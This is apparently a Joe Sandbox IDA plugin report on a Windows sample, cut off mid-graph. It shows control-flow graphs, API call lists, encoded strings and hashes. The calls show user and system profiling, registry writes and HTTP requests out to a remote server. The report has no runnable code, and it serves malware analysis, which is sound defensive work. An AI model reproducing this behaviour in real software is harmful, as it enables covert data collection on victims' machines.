                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: AttributesFile$CloseOpenValue$Info$QuerySystem$AddressEnumHandleModuleNativePathProcTempVersion
                • String ID: U0TF$U2Tn5it=$U73r4YGp$V0HDNw==$Xr3w6CYo$Y73u3CYt
                • API String ID: 3951112935-618692660
                • Opcode ID: b84da858c11ae2d0fb200222096ae366b937f75f5f6fc5f7c4b5690acd469b26
                • Instruction ID: 27e3b5c317dfbf69b5885e8ad88aa2d316310bfe45968d2ffe5bfe31f29550a2
                • Opcode Fuzzy Hash: b84da858c11ae2d0fb200222096ae366b937f75f5f6fc5f7c4b5690acd469b26
                • Instruction Fuzzy Hash: 80923871A001089BEF18DBB8CD89BEDBB72EF85314F64820CE054A73D6D7754E859B62

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1323 cbe8d0-cbe94a GetUserNameA 1324 cbe951-cbe956 1323->1324 1324->1324 1325 cbe958-cbec5c call cd40a0 call cd60c0 call cd6460 call cd60c0 call cd6460 call cd3190 call cd60c0 call cd6460 call cd60c0 call cd6460 call cd60c0 call cd6460 CoInitialize 1324->1325 1350 cbec5e-cbec7b CoCreateInstance 1325->1350 1351 cbec87 1325->1351 1352 cbf00d-cbf033 1350->1352 1353 cbec81 CoUninitialize 1350->1353 1354 cbec89-cbec92 1351->1354 1364 cbf039-cbf03e 1352->1364 1365 cbf0de-cbf1b1 call cdb4a0 call ce1c43 call cdeb47 call cb2400 1352->1365 1353->1351 1355 cbecc9-cbecef 1354->1355 1356 cbec94-cbeca9 1354->1356 1360 cbecf1-cbed06 1355->1360 1361 cbed26-cbed4c 1355->1361 1358 cbecab-cbecb9 1356->1358 1359 cbecbf-cbecc6 call cd9e86 1356->1359 1358->1359 1366 cbf48d call cdee79 1358->1366 1359->1355 1368 cbed08-cbed16 1360->1368 1369 cbed1c-cbed23 call cd9e86 1360->1369 1362 cbed4e-cbed63 1361->1362 1363 cbed83-cbeda9 1361->1363 1372 cbed79-cbed80 call cd9e86 1362->1372 1373 cbed65-cbed73 1362->1373 1374 cbedab-cbedba 1363->1374 1375 cbedda-cbedfe 1363->1375 1364->1351 1376 cbf044-cbf053 1364->1376 1465 cbf1b4-cbf1b9 1365->1465 1381 cbf492 call cdee79 1366->1381 1368->1366 1368->1369 1369->1361 1372->1363 1373->1366 1373->1372 1383 cbedbc-cbedca 1374->1383 1384 cbedd0-cbedd7 call cd9e86 1374->1384 1378 cbee00-cbee15 1375->1378 1379 cbee35-cbee5b 1375->1379 1402 cbf06c-cbf0d9 CoUninitialize call cd3190 * 4 call cbe8d0 1376->1402 1403 cbf055-cbf067 CoUninitialize 1376->1403 1386 cbee2b-cbee32 call cd9e86 1378->1386 1387 cbee17-cbee25 1378->1387 1389 cbee5d-cbee72 1379->1389 1390 cbee92-cbeeb8 1379->1390 1396 cbf497 call cdee79 1381->1396 1383->1366 1383->1384 1384->1375 1386->1379 1387->1366 1387->1386 1397 cbee88-cbee8f call cd9e86 1389->1397 1398 cbee74-cbee82 1389->1398 1399 cbeeba-cbeec9 1390->1399 1400 cbeee9-cbef0a 1390->1400 1417 cbf49c-cbf4a1 call cdee79 1396->1417 1397->1390 1398->1366 1398->1397 1410 cbeecb-cbeed9 1399->1410 1411 cbeedf-cbeee6 call cd9e86 1399->1411 1404 cbef38-cbef50 1400->1404 1405 cbef0c-cbef18 1400->1405 1402->1354 1403->1351 1418 cbef7e-cbef96 1404->1418 1419 cbef52-cbef5e 1404->1419 1414 cbef1a-cbef28 1405->1414 1415 cbef2e-cbef35 call cd9e86 1405->1415 1410->1366 1410->1411 1411->1400 1414->1366 1414->1415 1415->1404 1428 cbef98-cbefa4 1418->1428 1429 cbefc4-cbefdc 1418->1429 1426 cbef60-cbef6e 1419->1426 1427 cbef74-cbef7b call cd9e86 1419->1427 1426->1366 1426->1427 1427->1418 1437 cbefba-cbefc1 call cd9e86 1428->1437 1438 cbefa6-cbefb4 1428->1438 1431 cbf46f-cbf48c call cd9810 1429->1431 1432 cbefe2-cbefee 1429->1432 1440 cbf465-cbf46c call cd9e86 1432->1440 1441 cbeff4-cbf002 1432->1441 1437->1429 1438->1366 1438->1437 1440->1431 1441->1366 1448 cbf008 1441->1448 1448->1440 1465->1465 1466 cbf1bb-cbf1fa call cd40a0 call ce1cdf 1465->1466 1471 cbf22b-cbf27d call ce1c43 call cdeb47 call cb2400 1466->1471 1472 cbf1fc-cbf20b 1466->1472 1483 cbf280-cbf285 1471->1483 1473 cbf20d-cbf21b 1472->1473 1474 cbf221-cbf228 call cd9e86 1472->1474 1473->1381 1473->1474 1474->1471 1483->1483 1484 cbf287-cbf2c6 call cd40a0 call ce1cdf 1483->1484 1489 cbf2c8-cbf2d7 1484->1489 1490 cbf2f7-cbf34d call ce1c43 call cdeb47 call cb2400 1484->1490 1491 cbf2d9-cbf2e7 1489->1491 1492 cbf2ed-cbf2f4 call cd9e86 1489->1492 1501 cbf350-cbf355 1490->1501 1491->1396 1491->1492 1492->1490 1501->1501 1502 cbf357-cbf396 call cd40a0 call ce1cdf 1501->1502 1507 cbf398-cbf3a7 1502->1507 1508 cbf3c7-cbf460 CoUninitialize 1502->1508 1509 cbf3a9-cbf3b7 1507->1509 1510 cbf3bd-cbf3c4 call cd9e86 1507->1510 1508->1354 1509->1417 1509->1510 1510->1508
                APIs
                • GetUserNameA.ADVAPI32(?,?), ref: 00CBE91D
                • CoInitialize.OLE32(00000000), ref: 00CBEC54
                • CoCreateInstance.OLE32(00D0DFDC,00000000,00000001,00D0E03C,?), ref: 00CBEC73
                • CoUninitialize.OLE32 ref: 00CBEC81
                • CoUninitialize.OLE32 ref: 00CBF055
                • CoUninitialize.OLE32 ref: 00CBF06C
                • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CBF455
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Uninitialize$CreateInitializeInstanceNameUser
                • String ID: @3P$HVirDOPnQS2=$PXULuc==$PXUrDOPn$YJ3RNw==$eMLY5DB0Qy =$eMLY5zdpQw==
                • API String ID: 1775936440-1920291987
                • Opcode ID: 9a84f8bc8e309de9ebaf006501f07cde9432af33c2a63abe02ed041fcbd91269
                • Instruction ID: 73a7c0e04927f10fe70d92d527c052e60af474fed87d89b63fe6bd736e068616
                • Opcode Fuzzy Hash: 9a84f8bc8e309de9ebaf006501f07cde9432af33c2a63abe02ed041fcbd91269
                • Instruction Fuzzy Hash: 60628971A002589BDF24DF68CC88BDDBBB5EF49308F5081D9E40DA7291DB35AA85CF61

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1593 cb93d0-cb9452 call cdb4a0 GetVersionExW 1596 cb9458-cb9480 call cd3190 call cb61f0 1593->1596 1597 cb99f6-cb9a13 call cd9810 1593->1597 1604 cb9482 1596->1604 1605 cb9484-cb94a6 call cd3190 call cb61f0 1596->1605 1604->1605 1610 cb94aa-cb94c3 GetModuleHandleA GetProcAddress 1605->1610 1611 cb94a8 1605->1611 1612 cb94c5-cb94d4 1610->1612 1613 cb94f4-cb951f 1610->1613 1611->1610 1614 cb94ea-cb94f1 call cd9e86 1612->1614 1615 cb94d6-cb94e4 1612->1615 1616 cb9521-cb9530 1613->1616 1617 cb9550-cb9571 1613->1617 1614->1613 1615->1614 1622 cb9a14 call cdee79 1615->1622 1618 cb9532-cb9540 1616->1618 1619 cb9546-cb954d call cd9e86 1616->1619 1620 cb9573-cb9575 GetNativeSystemInfo 1617->1620 1621 cb9577 GetSystemInfo 1617->1621 1618->1619 1618->1622 1619->1617 1625 cb957d-cb9586 1620->1625 1621->1625 1628 cb9a19-cb9a1f call cdee79 1622->1628 1630 cb9588-cb958f 1625->1630 1631 cb95a4-cb95a7 1625->1631 1633 cb99f1 1630->1633 1634 cb9595-cb959f 1630->1634 1635 cb95ad-cb95b6 1631->1635 1636 cb9997-cb999a 1631->1636 1633->1597 1641 cb99ec 1634->1641 1637 cb95c9-cb95cc 1635->1637 1638 cb95b8-cb95c4 1635->1638 1636->1633 1639 cb999c-cb99a5 1636->1639 1642 cb95d2-cb95d9 1637->1642 1643 cb9974-cb9976 1637->1643 1638->1641 1644 cb99cc-cb99cf 1639->1644 1645 cb99a7-cb99ab 1639->1645 1641->1633 1646 cb96b9-cb995d call cd3190 call cb61f0 call cd3190 call cb61f0 call cb6320 call cd3190 call cb61f0 call cb91b0 call cd3190 call cb61f0 call cd3190 call cb61f0 call cb6320 call cd3190 call cb61f0 call cb91b0 call cd3190 call cb61f0 call cd3190 call cb61f0 call cb6320 call cd3190 call cb61f0 call cb91b0 call cd3190 call cb61f0 call cd3190 call cb61f0 call cb6320 call cd3190 call cb61f0 call cb91b0 1642->1646 1647 cb95df-cb963b call cd3190 call cb61f0 call cd3190 call cb61f0 call cb6320 1642->1647 1652 cb9978-cb9982 1643->1652 1653 cb9984-cb9987 1643->1653 1650 cb99dd-cb99e9 1644->1650 1651 cb99d1-cb99db 1644->1651 1648 cb99ad-cb99b2 1645->1648 1649 cb99c0-cb99ca 1645->1649 1689 cb9963-cb996c 1646->1689 1675 cb9640-cb9647 1647->1675 1648->1649 1655 cb99b4-cb99be 1648->1655 1649->1633 1650->1641 1651->1633 1652->1641 1653->1633 1657 cb9989-cb9995 1653->1657 1655->1633 1657->1641 1677 cb964b-cb966b call ce1cdf 1675->1677 1678 cb9649 1675->1678 1683 cb966d-cb967c 1677->1683 1684 cb96a2-cb96a4 1677->1684 1678->1677 1686 cb967e-cb968c 1683->1686 1687 cb9692-cb969f call cd9e86 1683->1687 1688 cb96aa-cb96b4 1684->1688 1684->1689 1686->1628 1686->1687 1687->1684 1688->1689 1689->1636 1693 cb996e 1689->1693 1693->1643
                APIs
                • GetVersionExW.KERNEL32(0000011C,79C85444,75920F00), ref: 00CB944A
                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB94AB
                • GetProcAddress.KERNEL32(00000000), ref: 00CB94B2
                • GetNativeSystemInfo.KERNEL32(?), ref: 00CB9573
                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB9577
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                • String ID: QouvFc==$QouvGM==$QouwEc==$QouwFM==
                • API String ID: 374719553-860442762
                • Opcode ID: 50617e8818ca99930a9edcd6b5e26a221899f35f2612fa63165fdad39da5e224
                • Instruction ID: d9c04a03570ee1d834946c6ad89d406dd071e291a27d73e049f0e137025c39c6
                • Opcode Fuzzy Hash: 50617e8818ca99930a9edcd6b5e26a221899f35f2612fa63165fdad39da5e224
                • Instruction Fuzzy Hash: 7A022370E00244ABDF24AB28DD4A3ED7BB1EB46310F50429DE915AB3C2DB344E859BD2

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1743 cee7de-cee810 call cee3ad call cee3b3 call cee411 1750 cee816-cee822 call cee3b9 1743->1750 1751 ceea74-ceeaaf call cdee96 call cee3ad call cee3b3 call cee411 1743->1751 1750->1751 1756 cee828-cee832 1750->1756 1781 ceebce-ceec2a call cdee96 call cf64e7 1751->1781 1782 ceeab5-ceeac1 call cee3b9 1751->1782 1758 cee869-cee86b 1756->1758 1759 cee834 1756->1759 1763 cee86e-cee877 1758->1763 1761 cee836-cee83c 1759->1761 1764 cee83e-cee841 1761->1764 1765 cee85c-cee85e 1761->1765 1763->1763 1767 cee879-cee88f call ce8235 1763->1767 1768 cee858-cee85a 1764->1768 1769 cee843-cee84b 1764->1769 1771 cee861-cee863 1765->1771 1777 ceea66-ceea6c call ce8006 1767->1777 1778 cee895-cee8b0 call ce8006 1767->1778 1768->1771 1769->1765 1773 cee84d-cee856 1769->1773 1771->1758 1775 ceea6d-ceea71 1771->1775 1773->1761 1773->1768 1777->1775 1788 cee8b3-cee8bd 1778->1788 1803 ceec2c-ceec32 1781->1803 1804 ceec34-ceec37 1781->1804 1782->1781 1793 ceeac7-ceead3 call cee3e5 1782->1793 1788->1788 1791 cee8bf-cee8d3 call cec4b9 1788->1791 1801 cee8d9-cee92b call cdb4a0 * 4 call cee797 1791->1801 1802 ceea72 1791->1802 1793->1781 1800 ceead9-ceeafa call ce8006 GetTimeZoneInformation 1793->1800 1816 ceebab-ceebcd call cee3a7 call cee39b call cee3a1 1800->1816 1817 ceeb00-ceeb20 1800->1817 1863 cee92c-cee92f 1801->1863 1802->1751 1807 ceec81-ceec93 1803->1807 1808 ceec3d-ceec50 call ce8235 1804->1808 1809 ceec39-ceec3b 1804->1809 1813 ceec95-ceec98 1807->1813 1814 ceeca3 1807->1814 1822 ceec5c-ceec75 call cf64e7 1808->1822 1823 ceec52 1808->1823 1809->1807 1813->1814 1819 ceec9a-ceeca1 call cee7de 1813->1819 1820 ceeca8-ceecbd call ce8006 call cd9810 1814->1820 1821 ceeca3 call ceea7f 1814->1821 1824 ceeb2a-ceeb32 1817->1824 1825 ceeb22-ceeb27 1817->1825 1819->1820 1821->1820 1847 ceec7a-ceec7b call ce8006 1822->1847 1848 ceec77-ceec78 1822->1848 1830 ceec53-ceec5a call ce8006 1823->1830 1832 ceeb44-ceeb46 1824->1832 1833 ceeb34-ceeb3b 1824->1833 1825->1824 1852 ceec80 1830->1852 1842 ceeb48-ceeba8 call cdb4a0 * 4 call ce2867 call ceecbe * 2 1832->1842 1833->1832 1841 ceeb3d-ceeb42 1833->1841 1841->1842 1842->1816 1847->1852 1848->1830 1852->1807 1865 cee934-cee937 1863->1865 1866 cee931 1863->1866 1865->1863 1868 cee939-cee947 1865->1868 1866->1865 1870 cee94c-cee961 call ce1a11 1868->1870 1871 cee949 1868->1871 1877 cee964-cee96a 1870->1877 1871->1870 1879 cee96c-cee973 1877->1879 1880 cee975-cee978 1877->1880 1879->1880 1882 cee97a-cee980 1879->1882 1880->1877 1884 ceea1a-ceea21 1882->1884 1885 cee986-cee9b1 call ce1a11 1882->1885 1886 ceea28-ceea39 1884->1886 1887 ceea23-ceea25 1884->1887 1893 cee9d3-cee9d9 1885->1893 1894 cee9b3-cee9b7 1885->1894 1889 ceea3b-ceea52 call cee797 1886->1889 1890 ceea55-ceea64 call cee3a7 call cee39b 1886->1890 1887->1886 1889->1890 1890->1777 1893->1884 1899 cee9db-cee9fe call ce1a11 1893->1899 1897 cee9b8-cee9be 1894->1897 1900 cee9d0 1897->1900 1901 cee9c0-cee9ce 1897->1901 1899->1884 1906 ceea00-ceea04 1899->1906 1900->1893 1901->1897 1901->1900 1907 ceea05-ceea08 1906->1907 1908 ceea0a-ceea15 1907->1908 1909 ceea17 1907->1909 1908->1907 1908->1909 1909->1884
                APIs
                • _free.LIBCMT ref: 00CEE89B
                • _free.LIBCMT ref: 00CEEA67
                • _free.LIBCMT ref: 00CEEADF
                • GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00CEECA0,?,?,00000000), ref: 00CEEAF1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free$InformationTimeZone
                • String ID: Eastern Standard Time$Eastern Summer Time
                • API String ID: 597776487-239921721
                • Opcode ID: 98b09bab70477680498356dfbe101046b636ed769b751935f17893c04a2864f0
                • Instruction ID: 5d26733280cda2d6f0e9d2f72c30d489d4a714ce8375026a62f5db3f9cc2b242
                • Opcode Fuzzy Hash: 98b09bab70477680498356dfbe101046b636ed769b751935f17893c04a2864f0
                • Instruction Fuzzy Hash: 0AA14C71900255ABDB10FF67DC92AAEBBB9EF00390F14406AF915E7391EB309E41DB90

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2289 cb91b0-cb921a 2290 cb92f3 2289->2290 2291 cb9220-cb9227 2289->2291 2293 cb92f5-cb92fb 2290->2293 2292 cb9230-cb9247 2291->2292 2296 cb93bd call cd45b0 2292->2296 2297 cb924d-cb926e call cd40a0 2292->2297 2294 cb92fd-cb9309 2293->2294 2295 cb932c-cb9332 2293->2295 2298 cb930b-cb9319 2294->2298 2299 cb931f-cb9329 call cd9e86 2294->2299 2302 cb935b-cb9373 2295->2302 2303 cb9334-cb933f 2295->2303 2304 cb93c2-cb9452 call cdee79 call cdb4a0 GetVersionExW 2296->2304 2313 cb929e-cb92e2 call cd5a20 2297->2313 2314 cb9270-cb927e 2297->2314 2298->2299 2298->2304 2299->2295 2309 cb939d-cb93bc call cd9810 2302->2309 2310 cb9375-cb9381 2302->2310 2307 cb9351-cb9358 call cd9e86 2303->2307 2308 cb9341-cb934f 2303->2308 2335 cb9458-cb9480 call cd3190 call cb61f0 2304->2335 2336 cb99f6-cb9a13 call cd9810 2304->2336 2307->2302 2308->2304 2308->2307 2317 cb9393-cb939a call cd9e86 2310->2317 2318 cb9383-cb9391 2310->2318 2313->2293 2332 cb92e4-cb92e9 2313->2332 2320 cb9280-cb928e 2314->2320 2321 cb9294-cb929b call cd9e86 2314->2321 2317->2309 2318->2304 2318->2317 2320->2304 2320->2321 2321->2313 2332->2290 2334 cb92eb-cb92ee 2332->2334 2334->2292 2343 cb9482 2335->2343 2344 cb9484-cb94a6 call cd3190 call cb61f0 2335->2344 2343->2344 2349 cb94aa-cb94c3 GetModuleHandleA GetProcAddress 2344->2349 2350 cb94a8 2344->2350 2351 cb94c5-cb94d4 2349->2351 2352 cb94f4-cb951f 2349->2352 2350->2349 2353 cb94ea-cb94f1 call cd9e86 2351->2353 2354 cb94d6-cb94e4 2351->2354 2355 cb9521-cb9530 2352->2355 2356 cb9550-cb9571 2352->2356 2353->2352 2354->2353 2361 cb9a14 call cdee79 2354->2361 2357 cb9532-cb9540 2355->2357 2358 cb9546-cb954d call cd9e86 2355->2358 2359 cb9573-cb9575 GetNativeSystemInfo 2356->2359 2360 cb9577 GetSystemInfo 2356->2360 2357->2358 2357->2361 2358->2356 2364 cb957d-cb9586 2359->2364 2360->2364 2367 cb9a19-cb9a1f call cdee79 2361->2367 2369 cb9588-cb958f 2364->2369 2370 cb95a4-cb95a7 2364->2370 2372 cb99f1 2369->2372 2373 cb9595-cb959f 2369->2373 2374 cb95ad-cb95b6 2370->2374 2375 cb9997-cb999a 2370->2375 2372->2336 2380 cb99ec 2373->2380 2376 cb95c9-cb95cc 2374->2376 2377 cb95b8-cb95c4 2374->2377 2375->2372 2378 cb999c-cb99a5 2375->2378 2381 cb95d2-cb95d9 2376->2381 2382 cb9974-cb9976 2376->2382 2377->2380 2383 cb99cc-cb99cf 2378->2383 2384 cb99a7-cb99ab 2378->2384 2380->2372 2385 cb96b9-cb995d call cd3190 call cb61f0 call cd3190 call cb61f0 call cb6320 call cd3190 call cb61f0 call cb91b0 call cd3190 call cb61f0 call cd3190 call cb61f0 call cb6320 call cd3190 call cb61f0 call cb91b0 call cd3190 call cb61f0 call cd3190 call cb61f0 call cb6320 call cd3190 call cb61f0 call cb91b0 call cd3190 call cb61f0 call cd3190 call cb61f0 call cb6320 call cd3190 call cb61f0 call cb91b0 2381->2385 2386 cb95df-cb9647 call cd3190 call cb61f0 call cd3190 call cb61f0 call cb6320 2381->2386 2391 cb9978-cb9982 2382->2391 2392 cb9984-cb9987 2382->2392 2389 cb99dd-cb99e9 2383->2389 2390 cb99d1-cb99db 2383->2390 2387 cb99ad-cb99b2 2384->2387 2388 cb99c0-cb99ca 2384->2388 2428 cb9963-cb996c 2385->2428 2416 cb964b-cb966b call ce1cdf 2386->2416 2417 cb9649 2386->2417 2387->2388 2394 cb99b4-cb99be 2387->2394 2388->2372 2389->2380 2390->2372 2391->2380 2392->2372 2396 cb9989-cb9995 2392->2396 2394->2372 2396->2380 2422 cb966d-cb967c 2416->2422 2423 cb96a2-cb96a4 2416->2423 2417->2416 2425 cb967e-cb968c 2422->2425 2426 cb9692-cb969f call cd9e86 2422->2426 2427 cb96aa-cb96b4 2423->2427 2423->2428 2425->2367 2425->2426 2426->2423 2427->2428 2428->2375 2432 cb996e 2428->2432 2432->2382
                APIs
                • GetVersionExW.KERNEL32(0000011C,79C85444,75920F00), ref: 00CB944A
                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB94AB
                • GetProcAddress.KERNEL32(00000000), ref: 00CB94B2
                • GetNativeSystemInfo.KERNEL32(?), ref: 00CB9573
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                • String ID:
                • API String ID: 2167034304-0
                • Opcode ID: af4fa4c25703d379b6fb6e999fb996f0f68a70eefb2b195732dcc2da25320f08
                • Instruction ID: be7b3804bf6bf5971ca49d179c8db1888c29b9b11adfc7751c8e29b0e493f2a2
                • Opcode Fuzzy Hash: af4fa4c25703d379b6fb6e999fb996f0f68a70eefb2b195732dcc2da25320f08
                • Instruction Fuzzy Hash: 91C1F471E002049BDF18DF68CC85BEDBBB5EF85310F508269E9159B3D2DB359A84CBA1
                APIs
                  • Part of subcall function 00CB61F0: GetUserNameA.ADVAPI32(?,?), ref: 00CB75BA
                  • Part of subcall function 00CB61F0: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00CB7600
                  • Part of subcall function 00CB61F0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 00CB760D
                • RegOpenKeyExA.KERNEL32(80000002,System,00000000,000F003F,?,00000000), ref: 00CCF3E2
                • RegCloseKey.KERNEL32(80000002), ref: 00CCF3F8
                • GetUserNameA.ADVAPI32(?,80000002), ref: 00CCF482
                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CCF50D
                  • Part of subcall function 00CB61F0: RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,79C85444,79C85444), ref: 00CB639C
                  • Part of subcall function 00CB61F0: RegQueryValueExA.KERNEL32(79C85444,?,00000000,00000000,?,00000400,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63CA
                  • Part of subcall function 00CB61F0: RegCloseKey.KERNEL32(79C85444,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63D6
                  • Part of subcall function 00CB61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 00CB64E3
                  • Part of subcall function 00CB61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00CB6511
                  • Part of subcall function 00CB61F0: RegCloseKey.ADVAPI32(80000001), ref: 00CB651A
                  • Part of subcall function 00CB61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 00CB663C
                  • Part of subcall function 00CB61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 00CB665F
                  • Part of subcall function 00CB61F0: RegCloseKey.ADVAPI32(80000002), ref: 00CB6668
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: CloseNameOpen$Value$User$AccountAuthorityFileIdentifierLookupModuleQuery
                • String ID: 22C4$22S4$246122658369$2re4$3LU4$RXYvEc==$System$V$c5a4ec$e1K4$f774$f8G4$fMS4$g7K4$gLG4$goU=$h1Y4$hsG4
                • API String ID: 4106312383-2964168004
                • Opcode ID: 91433a6af0b639f0d373056c6553d4ab1a265d426c4186c0637790f88c091275
                • Instruction ID: f6a26433e5fd7242631aed1442cae84811f2957d7affc152d41921894709e93c
                • Opcode Fuzzy Hash: 91433a6af0b639f0d373056c6553d4ab1a265d426c4186c0637790f88c091275
                • Instruction Fuzzy Hash: 94D20071A001589BEB29DB28CD89BDDBB769B81308F6081DDE108A73D6DB354FC58F52

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1518 cc05b0-cc05fc 1519 cc0a07-cc0a32 call cd40a0 1518->1519 1520 cc0602-cc0606 1518->1520 1525 cc0a34-cc0a40 1519->1525 1526 cc0a60-cc0a78 1519->1526 1520->1519 1522 cc060c-cc0610 1520->1522 1522->1519 1524 cc0616-cc06b4 Sleep InternetOpenW InternetConnectA call cd3190 call cb61f0 1522->1524 1549 cc06b8-cc06d4 HttpOpenRequestA 1524->1549 1550 cc06b6 1524->1550 1528 cc0a56-cc0a5d call cd9e86 1525->1528 1529 cc0a42-cc0a50 1525->1529 1530 cc09be-cc09d6 1526->1530 1531 cc0a7e-cc0a8a 1526->1531 1528->1526 1529->1528 1533 cc0adb-cc0ae0 call cdee79 1529->1533 1537 cc09dc-cc09e8 1530->1537 1538 cc0aaf-cc0acb call cd9810 1530->1538 1535 cc09b4-cc09bb call cd9e86 1531->1535 1536 cc0a90-cc0a9e 1531->1536 1535->1530 1536->1533 1544 cc0aa0 1536->1544 1545 cc09ee-cc09fc 1537->1545 1546 cc0aa5-cc0aac call cd9e86 1537->1546 1544->1535 1545->1533 1554 cc0a02 1545->1554 1546->1538 1555 cc0705-cc0774 call cd3190 call cb61f0 call cd3190 call cb61f0 1549->1555 1556 cc06d6-cc06e5 1549->1556 1550->1549 1554->1546 1570 cc0778-cc078e HttpSendRequestA 1555->1570 1571 cc0776 1555->1571 1558 cc06fb-cc0702 call cd9e86 1556->1558 1559 cc06e7-cc06f5 1556->1559 1558->1555 1559->1558 1572 cc07bf-cc07e7 1570->1572 1573 cc0790-cc079f 1570->1573 1571->1570 1576 cc0818-cc0839 InternetReadFile 1572->1576 